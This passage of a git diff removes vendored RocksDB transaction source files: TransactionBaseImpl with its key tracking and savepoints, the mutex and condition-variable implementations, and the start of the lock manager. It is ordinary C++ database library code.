-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::SingleDelete(ColumnFamilyHandle* column_family,
-                                         const Slice& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->SingleDelete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::SingleDelete(ColumnFamilyHandle* column_family,
-                                         const SliceParts& key) {
-  Status s =
-      TryLock(column_family, key, false /* read_only */, true /* exclusive */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->SingleDelete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::PutUntracked(ColumnFamilyHandle* column_family,
-                                         const Slice& key, const Slice& value) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::PutUntracked(ColumnFamilyHandle* column_family,
-                                         const SliceParts& key,
-                                         const SliceParts& value) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Put(column_family, key, value);
-    if (s.ok()) {
-      num_puts_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::MergeUntracked(ColumnFamilyHandle* column_family,
-                                           const Slice& key,
-                                           const Slice& value) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Merge(column_family, key, value);
-    if (s.ok()) {
-      num_merges_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::DeleteUntracked(ColumnFamilyHandle* column_family,
-                                            const Slice& key) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-Status TransactionBaseImpl::DeleteUntracked(ColumnFamilyHandle* column_family,
-                                            const SliceParts& key) {
-  Status s = TryLock(column_family, key, false /* read_only */,
-                     true /* exclusive */, true /* untracked */);
-
-  if (s.ok()) {
-    s = GetBatchForWrite()->Delete(column_family, key);
-    if (s.ok()) {
-      num_deletes_++;
-    }
-  }
-
-  return s;
-}
-
-void TransactionBaseImpl::PutLogData(const Slice& blob) {
-  write_batch_.PutLogData(blob);
-}
-
-WriteBatchWithIndex* TransactionBaseImpl::GetWriteBatch() {
-  return &write_batch_;
-}
-
-uint64_t TransactionBaseImpl::GetElapsedTime() const {
-  return (db_->GetEnv()->NowMicros() - start_time_) / 1000;
-}
-
-uint64_t TransactionBaseImpl::GetNumPuts() const { return num_puts_; }
-
-uint64_t TransactionBaseImpl::GetNumDeletes() const { return num_deletes_; }
-
-uint64_t TransactionBaseImpl::GetNumMerges() const { return num_merges_; }
-
-uint64_t TransactionBaseImpl::GetNumKeys() const {
-  uint64_t count = 0;
-
-  // sum up locked keys in all column families
-  for (const auto& key_map_iter : tracked_keys_) {
-    const auto& keys = key_map_iter.second;
-    count += keys.size();
-  }
-
-  return count;
-}
-
-void TransactionBaseImpl::TrackKey(uint32_t cfh_id, const std::string& key,
-                                   SequenceNumber seq, bool read_only,
-                                   bool exclusive) {
-  // Update map of all tracked keys for this transaction
-  TrackKey(&tracked_keys_, cfh_id, key, seq, read_only, exclusive);
-
-  if (save_points_ != nullptr && !save_points_->empty()) {
-    // Update map of tracked keys in this SavePoint
-    TrackKey(&save_points_->top().new_keys_, cfh_id, key, seq, read_only,
-             exclusive);
-  }
-}
-
-// Add a key to the given TransactionKeyMap
-void TransactionBaseImpl::TrackKey(TransactionKeyMap* key_map, uint32_t cfh_id,
-                                   const std::string& key, SequenceNumber seq,
-                                   bool read_only, bool exclusive) {
-  auto& cf_key_map = (*key_map)[cfh_id];
-  auto iter = cf_key_map.find(key);
-  if (iter == cf_key_map.end()) {
-    auto result = cf_key_map.insert({key, TransactionKeyMapInfo(seq)});
-    iter = result.first;
-  } else if (seq < iter->second.seq) {
-    // Now tracking this key with an earlier sequence number
-    iter->second.seq = seq;
-  }
-
-  if (read_only) {
-    iter->second.num_reads++;
-  } else {
-    iter->second.num_writes++;
-  }
-  iter->second.exclusive |= exclusive;
-}
-
-std::unique_ptr<TransactionKeyMap>
-TransactionBaseImpl::GetTrackedKeysSinceSavePoint() {
-  if (save_points_ != nullptr && !save_points_->empty()) {
-    // Examine the number of reads/writes performed on all keys written
-    // since the last SavePoint and compare to the total number of reads/writes
-    // for each key.
-    TransactionKeyMap* result = new TransactionKeyMap();
-    for (const auto& key_map_iter : save_points_->top().new_keys_) {
-      uint32_t column_family_id = key_map_iter.first;
-      auto& keys = key_map_iter.second;
-
-      auto& cf_tracked_keys = tracked_keys_[column_family_id];
-
-      for (const auto& key_iter : keys) {
-        const std::string& key = key_iter.first;
-        uint32_t num_reads = key_iter.second.num_reads;
-        uint32_t num_writes = key_iter.second.num_writes;
-
-        auto total_key_info = cf_tracked_keys.find(key);
-        assert(total_key_info != cf_tracked_keys.end());
-        assert(total_key_info->second.num_reads >= num_reads);
-        assert(total_key_info->second.num_writes >= num_writes);
-
-        if (total_key_info->second.num_reads == num_reads &&
-            total_key_info->second.num_writes == num_writes) {
-          // All the reads/writes to this key were done in the last savepoint.
-          bool read_only = (num_writes == 0);
-          TrackKey(result, column_family_id, key, key_iter.second.seq,
-                   read_only, key_iter.second.exclusive);
-        }
-      }
-    }
-    return std::unique_ptr<TransactionKeyMap>(result);
-  }
-
-  // No SavePoint
-  return nullptr;
-}
-
-// Gets the write batch that should be used for Put/Merge/Deletes.
-//
-// Returns either a WriteBatch or WriteBatchWithIndex depending on whether
-// DisableIndexing() has been called.
-WriteBatchBase* TransactionBaseImpl::GetBatchForWrite() {
-  if (indexing_enabled_) {
-    // Use WriteBatchWithIndex
-    return &write_batch_;
-  } else {
-    // Don't use WriteBatchWithIndex. Return base WriteBatch.
-    return write_batch_.GetWriteBatch();
-  }
-}
-
-void TransactionBaseImpl::ReleaseSnapshot(const Snapshot* snapshot, DB* db) {
-  if (snapshot != nullptr) {
-    db->ReleaseSnapshot(snapshot);
-  }
-}
-
-void TransactionBaseImpl::UndoGetForUpdate(ColumnFamilyHandle* column_family,
-                                           const Slice& key) {
-  uint32_t column_family_id = GetColumnFamilyID(column_family);
-  auto& cf_tracked_keys = tracked_keys_[column_family_id];
-  std::string key_str = key.ToString();
-  bool can_decrement = false;
-  bool can_unlock __attribute__((unused)) = false;
-
-  if (save_points_ != nullptr && !save_points_->empty()) {
-    // Check if this key was fetched ForUpdate in this SavePoint
-    auto& cf_savepoint_keys = save_points_->top().new_keys_[column_family_id];
-
-    auto savepoint_iter = cf_savepoint_keys.find(key_str);
-    if (savepoint_iter != cf_savepoint_keys.end()) {
-      if (savepoint_iter->second.num_reads > 0) {
-        savepoint_iter->second.num_reads--;
-        can_decrement = true;
-
-        if (savepoint_iter->second.num_reads == 0 &&
-            savepoint_iter->second.num_writes == 0) {
-          // No other GetForUpdates or write on this key in this SavePoint
-          cf_savepoint_keys.erase(savepoint_iter);
-          can_unlock = true;
-        }
-      }
-    }
-  } else {
-    // No SavePoint set
-    can_decrement = true;
-    can_unlock = true;
-  }
-
-  // We can only decrement the read count for this key if we were able to
-  // decrement the read count in the current SavePoint, OR if there is no
-  // SavePoint set.
-  if (can_decrement) {
-    auto key_iter = cf_tracked_keys.find(key_str);
-
-    if (key_iter != cf_tracked_keys.end()) {
-      if (key_iter->second.num_reads > 0) {
-        key_iter->second.num_reads--;
-
-        if (key_iter->second.num_reads == 0 &&
-            key_iter->second.num_writes == 0) {
-          // No other GetForUpdates or writes on this key
-          assert(can_unlock);
-          cf_tracked_keys.erase(key_iter);
-          UnlockGetForUpdate(column_family, key);
-        }
-      }
-    }
-  }
-}
-
-Status TransactionBaseImpl::RebuildFromWriteBatch(WriteBatch* src_batch) {
-  struct IndexedWriteBatchBuilder : public WriteBatch::Handler {
-    Transaction* txn_;
-    DBImpl* db_;
-    IndexedWriteBatchBuilder(Transaction* txn, DBImpl* db)
-        : txn_(txn), db_(db) {
-      assert(dynamic_cast<TransactionBaseImpl*>(txn_) != nullptr);
-    }
-
-    Status PutCF(uint32_t cf, const Slice& key, const Slice& val) override {
-      return txn_->Put(db_->GetColumnFamilyHandle(cf), key, val);
-    }
-
-    Status DeleteCF(uint32_t cf, const Slice& key) override {
-      return txn_->Delete(db_->GetColumnFamilyHandle(cf), key);
-    }
-
-    Status SingleDeleteCF(uint32_t cf, const Slice& key) override {
-      return txn_->SingleDelete(db_->GetColumnFamilyHandle(cf), key);
-    }
-
-    Status MergeCF(uint32_t cf, const Slice& key, const Slice& val) override {
-      return txn_->Merge(db_->GetColumnFamilyHandle(cf), key, val);
-    }
-
-    // this is used for reconstructing prepared transactions upon
-    // recovery. there should not be any meta markers in the batches
-    // we are processing.
-    Status MarkBeginPrepare() override { return Status::InvalidArgument(); }
-
-    Status MarkEndPrepare(const Slice&) override {
-      return Status::InvalidArgument();
-    }
-
-    Status MarkCommit(const Slice&) override {
-      return Status::InvalidArgument();
-    }
-
-    Status MarkRollback(const Slice&) override {
-      return Status::InvalidArgument();
-    }
-  };
-
-  IndexedWriteBatchBuilder copycat(this, dbimpl_);
-  return src_batch->Iterate(&copycat);
-}
-
-WriteBatch* TransactionBaseImpl::GetCommitTimeWriteBatch() {
-  return &commit_time_batch_;
-}
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_base.h b/thirdparty/rocksdb/utilities/transactions/transaction_base.h
deleted file mode 100644
index c73b329..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_base.h
+++ /dev/null
@@ -1,338 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <stack>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class TransactionBaseImpl : public Transaction {
- public:
-  TransactionBaseImpl(DB* db, const WriteOptions& write_options);
-
-  virtual ~TransactionBaseImpl();
-
-  // Remove pending operations queued in this transaction.
-  virtual void Clear();
-
-  void Reinitialize(DB* db, const WriteOptions& write_options);
-
-  // Called before executing Put, Merge, Delete, and GetForUpdate.  If TryLock
-  // returns non-OK, the Put/Merge/Delete/GetForUpdate will be failed.
-  // untracked will be true if called from PutUntracked, DeleteUntracked, or
-  // MergeUntracked.
-  virtual Status TryLock(ColumnFamilyHandle* column_family, const Slice& key,
-                         bool read_only, bool exclusive,
-                         bool untracked = false) = 0;
-
-  void SetSavePoint() override;
-
-  Status RollbackToSavePoint() override;
-
-  using Transaction::Get;
-  Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family,
-             const Slice& key, std::string* value) override;
-
-  Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family,
-             const Slice& key, PinnableSlice* value) override;
-
-  Status Get(const ReadOptions& options, const Slice& key,
-             std::string* value) override {
-    return Get(options, db_->DefaultColumnFamily(), key, value);
-  }
-
-  using Transaction::GetForUpdate;
-  Status GetForUpdate(const ReadOptions& options,
-                      ColumnFamilyHandle* column_family, const Slice& key,
-                      std::string* value, bool exclusive) override;
-
-  Status GetForUpdate(const ReadOptions& options,
-                      ColumnFamilyHandle* column_family, const Slice& key,
-                      PinnableSlice* pinnable_val, bool exclusive) override;
-
-  Status GetForUpdate(const ReadOptions& options, const Slice& key,
-                      std::string* value, bool exclusive) override {
-    return GetForUpdate(options, db_->DefaultColumnFamily(), key, value,
-                        exclusive);
-  }
-
-  std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  std::vector<Status> MultiGet(const ReadOptions& options,
-                               const std::vector<Slice>& keys,
-                               std::vector<std::string>* values) override {
-    return MultiGet(options, std::vector<ColumnFamilyHandle*>(
-                                 keys.size(), db_->DefaultColumnFamily()),
-                    keys, values);
-  }
-
-  std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  std::vector<Status> MultiGetForUpdate(
-      const ReadOptions& options, const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    return MultiGetForUpdate(options,
-                             std::vector<ColumnFamilyHandle*>(
-                                 keys.size(), db_->DefaultColumnFamily()),
-                             keys, values);
-  }
-
-  Iterator* GetIterator(const ReadOptions& read_options) override;
-  Iterator* GetIterator(const ReadOptions& read_options,
-                        ColumnFamilyHandle* column_family) override;
-
-  Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-             const Slice& value) override;
-  Status Put(const Slice& key, const Slice& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-             const SliceParts& value) override;
-  Status Put(const SliceParts& key, const SliceParts& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-               const Slice& value) override;
-  Status Merge(const Slice& key, const Slice& value) override {
-    return Merge(nullptr, key, value);
-  }
-
-  Status Delete(ColumnFamilyHandle* column_family, const Slice& key) override;
-  Status Delete(const Slice& key) override { return Delete(nullptr, key); }
-  Status Delete(ColumnFamilyHandle* column_family,
-                const SliceParts& key) override;
-  Status Delete(const SliceParts& key) override { return Delete(nullptr, key); }
-
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const Slice& key) override;
-  Status SingleDelete(const Slice& key) override {
-    return SingleDelete(nullptr, key);
-  }
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const SliceParts& key) override;
-  Status SingleDelete(const SliceParts& key) override {
-    return SingleDelete(nullptr, key);
-  }
-
-  Status PutUntracked(ColumnFamilyHandle* column_family, const Slice& key,
-                      const Slice& value) override;
-  Status PutUntracked(const Slice& key, const Slice& value) override {
-    return PutUntracked(nullptr, key, value);
-  }
-
-  Status PutUntracked(ColumnFamilyHandle* column_family, const SliceParts& key,
-                      const SliceParts& value) override;
-  Status PutUntracked(const SliceParts& key, const SliceParts& value) override {
-    return PutUntracked(nullptr, key, value);
-  }
-
-  Status MergeUntracked(ColumnFamilyHandle* column_family, const Slice& key,
-                        const Slice& value) override;
-  Status MergeUntracked(const Slice& key, const Slice& value) override {
-    return MergeUntracked(nullptr, key, value);
-  }
-
-  Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                         const Slice& key) override;
-  Status DeleteUntracked(const Slice& key) override {
-    return DeleteUntracked(nullptr, key);
-  }
-  Status DeleteUntracked(ColumnFamilyHandle* column_family,
-                         const SliceParts& key) override;
-  Status DeleteUntracked(const SliceParts& key) override {
-    return DeleteUntracked(nullptr, key);
-  }
-
-  void PutLogData(const Slice& blob) override;
-
-  WriteBatchWithIndex* GetWriteBatch() override;
-
-  virtual void SetLockTimeout(int64_t timeout) override { /* Do nothing */
-  }
-
-  const Snapshot* GetSnapshot() const override {
-    return snapshot_ ? snapshot_.get() : nullptr;
-  }
-
-  void SetSnapshot() override;
-  void SetSnapshotOnNextOperation(
-      std::shared_ptr<TransactionNotifier> notifier = nullptr) override;
-
-  void ClearSnapshot() override {
-    snapshot_.reset();
-    snapshot_needed_ = false;
-    snapshot_notifier_ = nullptr;
-  }
-
-  void DisableIndexing() override { indexing_enabled_ = false; }
-
-  void EnableIndexing() override { indexing_enabled_ = true; }
-
-  uint64_t GetElapsedTime() const override;
-
-  uint64_t GetNumPuts() const override;
-
-  uint64_t GetNumDeletes() const override;
-
-  uint64_t GetNumMerges() const override;
-
-  uint64_t GetNumKeys() const override;
-
-  void UndoGetForUpdate(ColumnFamilyHandle* column_family,
-                        const Slice& key) override;
-  void UndoGetForUpdate(const Slice& key) override {
-    return UndoGetForUpdate(nullptr, key);
-  };
-
-  // Get list of keys in this transaction that must not have any conflicts
-  // with writes in other transactions.
-  const TransactionKeyMap& GetTrackedKeys() const { return tracked_keys_; }
-
-  WriteOptions* GetWriteOptions() override { return &write_options_; }
-
-  void SetWriteOptions(const WriteOptions& write_options) override {
-    write_options_ = write_options;
-  }
-
-  // Used for memory management for snapshot_
-  void ReleaseSnapshot(const Snapshot* snapshot, DB* db);
-
-  // iterates over the given batch and makes the appropriate inserts.
-  // used for rebuilding prepared transactions after recovery.
-  Status RebuildFromWriteBatch(WriteBatch* src_batch) override;
-
-  WriteBatch* GetCommitTimeWriteBatch() override;
-
- protected:
-  // Add a key to the list of tracked keys.
-  //
-  // seqno is the earliest seqno this key was involved with this transaction.
-  // readonly should be set to true if no data was written for this key
-  void TrackKey(uint32_t cfh_id, const std::string& key, SequenceNumber seqno,
-                bool readonly, bool exclusive);
-
-  // Helper function to add a key to the given TransactionKeyMap
-  static void TrackKey(TransactionKeyMap* key_map, uint32_t cfh_id,
-                       const std::string& key, SequenceNumber seqno,
-                       bool readonly, bool exclusive);
-
-  // Called when UndoGetForUpdate determines that this key can be unlocked.
-  virtual void UnlockGetForUpdate(ColumnFamilyHandle* column_family,
-                                  const Slice& key) = 0;
-
-  std::unique_ptr<TransactionKeyMap> GetTrackedKeysSinceSavePoint();
-
-  // Sets a snapshot if SetSnapshotOnNextOperation() has been called.
-  void SetSnapshotIfNeeded();
-
-  DB* db_;
-  DBImpl* dbimpl_;
-
-  WriteOptions write_options_;
-
-  const Comparator* cmp_;
-
-  // Stores that time the txn was constructed, in microseconds.
-  uint64_t start_time_;
-
-  // Stores the current snapshot that was set by SetSnapshot or null if
-  // no snapshot is currently set.
-  std::shared_ptr<const Snapshot> snapshot_;
-
-  // Count of various operations pending in this transaction
-  uint64_t num_puts_ = 0;
-  uint64_t num_deletes_ = 0;
-  uint64_t num_merges_ = 0;
-
-  struct SavePoint {
-    std::shared_ptr<const Snapshot> snapshot_;
-    bool snapshot_needed_;
-    std::shared_ptr<TransactionNotifier> snapshot_notifier_;
-    uint64_t num_puts_;
-    uint64_t num_deletes_;
-    uint64_t num_merges_;
-
-    // Record all keys tracked since the last savepoint
-    TransactionKeyMap new_keys_;
-
-    SavePoint(std::shared_ptr<const Snapshot> snapshot, bool snapshot_needed,
-              std::shared_ptr<TransactionNotifier> snapshot_notifier,
-              uint64_t num_puts, uint64_t num_deletes, uint64_t num_merges)
-        : snapshot_(snapshot),
-          snapshot_needed_(snapshot_needed),
-          snapshot_notifier_(snapshot_notifier),
-          num_puts_(num_puts),
-          num_deletes_(num_deletes),
-          num_merges_(num_merges) {}
-  };
-
-  // Records writes pending in this transaction
-  WriteBatchWithIndex write_batch_;
-
- private:
-  // batch to be written at commit time
-  WriteBatch commit_time_batch_;
-
-  // Stack of the Snapshot saved at each save point.  Saved snapshots may be
-  // nullptr if there was no snapshot at the time SetSavePoint() was called.
-  std::unique_ptr<std::stack<TransactionBaseImpl::SavePoint>> save_points_;
-
-  // Map from column_family_id to map of keys that are involved in this
-  // transaction.
-  // Pessimistic Transactions will do conflict checking before adding a key
-  // by calling TrackKey().
-  // Optimistic Transactions will wait till commit time to do conflict checking.
-  TransactionKeyMap tracked_keys_;
-
-  // If true, future Put/Merge/Deletes will be indexed in the
-  // WriteBatchWithIndex.
-  // If false, future Put/Merge/Deletes will be inserted directly into the
-  // underlying WriteBatch and not indexed in the WriteBatchWithIndex.
-  bool indexing_enabled_;
-
-  // SetSnapshotOnNextOperation() has been called and the snapshot has not yet
-  // been reset.
-  bool snapshot_needed_ = false;
-
-  // SetSnapshotOnNextOperation() has been called and the caller would like
-  // a notification through the TransactionNotifier interface
-  std::shared_ptr<TransactionNotifier> snapshot_notifier_ = nullptr;
-
-  Status TryLock(ColumnFamilyHandle* column_family, const SliceParts& key,
-                 bool read_only, bool exclusive, bool untracked = false);
-
-  WriteBatchBase* GetBatchForWrite();
-
-  void SetSnapshotInternal(const Snapshot* snapshot);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.cc b/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.cc
deleted file mode 100644
index b6120a1..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.cc
+++ /dev/null
@@ -1,135 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/transaction_db_mutex_impl.h"
-
-#include <chrono>
-#include <condition_variable>
-#include <functional>
-#include <mutex>
-
-#include "rocksdb/utilities/transaction_db_mutex.h"
-
-namespace rocksdb {
-
-class TransactionDBMutexImpl : public TransactionDBMutex {
- public:
-  TransactionDBMutexImpl() {}
-  ~TransactionDBMutexImpl() {}
-
-  Status Lock() override;
-
-  Status TryLockFor(int64_t timeout_time) override;
-
-  void UnLock() override { mutex_.unlock(); }
-
-  friend class TransactionDBCondVarImpl;
-
- private:
-  std::mutex mutex_;
-};
-
-class TransactionDBCondVarImpl : public TransactionDBCondVar {
- public:
-  TransactionDBCondVarImpl() {}
-  ~TransactionDBCondVarImpl() {}
-
-  Status Wait(std::shared_ptr<TransactionDBMutex> mutex) override;
-
-  Status WaitFor(std::shared_ptr<TransactionDBMutex> mutex,
-                 int64_t timeout_time) override;
-
-  void Notify() override { cv_.notify_one(); }
-
-  void NotifyAll() override { cv_.notify_all(); }
-
- private:
-  std::condition_variable cv_;
-};
-
-std::shared_ptr<TransactionDBMutex>
-TransactionDBMutexFactoryImpl::AllocateMutex() {
-  return std::shared_ptr<TransactionDBMutex>(new TransactionDBMutexImpl());
-}
-
-std::shared_ptr<TransactionDBCondVar>
-TransactionDBMutexFactoryImpl::AllocateCondVar() {
-  return std::shared_ptr<TransactionDBCondVar>(new TransactionDBCondVarImpl());
-}
-
-Status TransactionDBMutexImpl::Lock() {
-  mutex_.lock();
-  return Status::OK();
-}
-
-Status TransactionDBMutexImpl::TryLockFor(int64_t timeout_time) {
-  bool locked = true;
-
-  if (timeout_time == 0) {
-    locked = mutex_.try_lock();
-  } else {
-    // Previously, this code used a std::timed_mutex.  However, this was changed
-    // due to known bugs in gcc versions < 4.9.
-    // https://gcc.gnu.org/bugzilla/show_bug.cgi?id=54562
-    //
-    // Since this mutex isn't held for long and only a single mutex is ever
-    // held at a time, it is reasonable to ignore the lock timeout_time here
-    // and only check it when waiting on the condition_variable.
-    mutex_.lock();
-  }
-
-  if (!locked) {
-    // timeout acquiring mutex
-    return Status::TimedOut(Status::SubCode::kMutexTimeout);
-  }
-
-  return Status::OK();
-}
-
-Status TransactionDBCondVarImpl::Wait(
-    std::shared_ptr<TransactionDBMutex> mutex) {
-  auto mutex_impl = reinterpret_cast<TransactionDBMutexImpl*>(mutex.get());
-
-  std::unique_lock<std::mutex> lock(mutex_impl->mutex_, std::adopt_lock);
-  cv_.wait(lock);
-
-  // Make sure unique_lock doesn't unlock mutex when it destructs
-  lock.release();
-
-  return Status::OK();
-}
-
-Status TransactionDBCondVarImpl::WaitFor(
-    std::shared_ptr<TransactionDBMutex> mutex, int64_t timeout_time) {
-  Status s;
-
-  auto mutex_impl = reinterpret_cast<TransactionDBMutexImpl*>(mutex.get());
-  std::unique_lock<std::mutex> lock(mutex_impl->mutex_, std::adopt_lock);
-
-  if (timeout_time < 0) {
-    // If timeout is negative, do not use a timeout
-    cv_.wait(lock);
-  } else {
-    auto duration = std::chrono::microseconds(timeout_time);
-    auto cv_status = cv_.wait_for(lock, duration);
-
-    // Check if the wait stopped due to timing out.
-    if (cv_status == std::cv_status::timeout) {
-      s = Status::TimedOut(Status::SubCode::kMutexTimeout);
-    }
-  }
-
-  // Make sure unique_lock doesn't unlock mutex when it destructs
-  lock.release();
-
-  // CV was signaled, or we spuriously woke up (but didn't time out)
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.h b/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.h
deleted file mode 100644
index 2cce05b..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_db_mutex_impl.h
+++ /dev/null
@@ -1,26 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/transaction_db_mutex.h"
-
-namespace rocksdb {
-
-class TransactionDBMutex;
-class TransactionDBCondVar;
-
-// Default implementation of TransactionDBMutexFactory.  May be overridden
-// by TransactionDBOptions.custom_mutex_factory.
-class TransactionDBMutexFactoryImpl : public TransactionDBMutexFactory {
- public:
-  std::shared_ptr<TransactionDBMutex> AllocateMutex() override;
-  std::shared_ptr<TransactionDBCondVar> AllocateCondVar() override;
-};
-
-}  //  namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.cc b/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.cc
deleted file mode 100644
index a72c2a1..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.cc
+++ /dev/null
@@ -1,742 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/transactions/transaction_lock_mgr.h"
-
-#include <inttypes.h>
-
-#include <algorithm>
-#include <condition_variable>
-#include <functional>
-#include <mutex>
-#include <string>
-#include <vector>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/transaction_db_mutex.h"
-#include "util/cast_util.h"
-#include "util/murmurhash.h"
-#include "util/sync_point.h"
-#include "util/thread_local.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-namespace rocksdb {
-
-struct LockInfo {
-  bool exclusive;
-  autovector<TransactionID> txn_ids;
-
-  // Transaction locks are not valid after this time in us
-  uint64_t expiration_time;
-
-  LockInfo(TransactionID id, uint64_t time, bool ex)
-      : exclusive(ex), expiration_time(time) {
-    txn_ids.push_back(id);
-  }
-  LockInfo(const LockInfo& lock_info)
-      : exclusive(lock_info.exclusive),
-        txn_ids(lock_info.txn_ids),
-        expiration_time(lock_info.expiration_time) {}
-};
-
-struct LockMapStripe {
-  explicit LockMapStripe(std::shared_ptr<TransactionDBMutexFactory> factory) {
-    stripe_mutex = factory->AllocateMutex();
-    stripe_cv = factory->AllocateCondVar();
-    assert(stripe_mutex);
-    assert(stripe_cv);
-  }
-
-  // Mutex must be held before modifying keys map
-  std::shared_ptr<TransactionDBMutex> stripe_mutex;
-
-  // Condition Variable per stripe for waiting on a lock
-  std::shared_ptr<TransactionDBCondVar> stripe_cv;
-
-  // Locked keys mapped to the info about the transactions that locked them.
-  // TODO(agiardullo): Explore performance of other data structures.
-  std::unordered_map<std::string, LockInfo> keys;
-};
-
-// Map of #num_stripes LockMapStripes
-struct LockMap {
-  explicit LockMap(size_t num_stripes,
-                   std::shared_ptr<TransactionDBMutexFactory> factory)
-      : num_stripes_(num_stripes) {
-    lock_map_stripes_.reserve(num_stripes);
-    for (size_t i = 0; i < num_stripes; i++) {
-      LockMapStripe* stripe = new LockMapStripe(factory);
-      lock_map_stripes_.push_back(stripe);
-    }
-  }
-
-  ~LockMap() {
-    for (auto stripe : lock_map_stripes_) {
-      delete stripe;
-    }
-  }
-
-  // Number of sepearate LockMapStripes to create, each with their own Mutex
-  const size_t num_stripes_;
-
-  // Count of keys that are currently locked in this column family.
-  // (Only maintained if TransactionLockMgr::max_num_locks_ is positive.)
-  std::atomic<int64_t> lock_cnt{0};
-
-  std::vector<LockMapStripe*> lock_map_stripes_;
-
-  size_t GetStripe(const std::string& key) const;
-};
-
-void DeadlockInfoBuffer::AddNewPath(DeadlockPath path) {
-  std::lock_guard<std::mutex> lock(paths_buffer_mutex_);
-
-  if (paths_buffer_.empty()) {
-    return;
-  }
-
-  paths_buffer_[buffer_idx_] = path;
-  buffer_idx_ = (buffer_idx_ + 1) % paths_buffer_.size();
-}
-
-void DeadlockInfoBuffer::Resize(uint32_t target_size) {
-  std::lock_guard<std::mutex> lock(paths_buffer_mutex_);
-
-  paths_buffer_ = Normalize();
-
-  // Drop the deadlocks that will no longer be needed ater the normalize
-  if (target_size < paths_buffer_.size()) {
-    paths_buffer_.erase(
-        paths_buffer_.begin(),
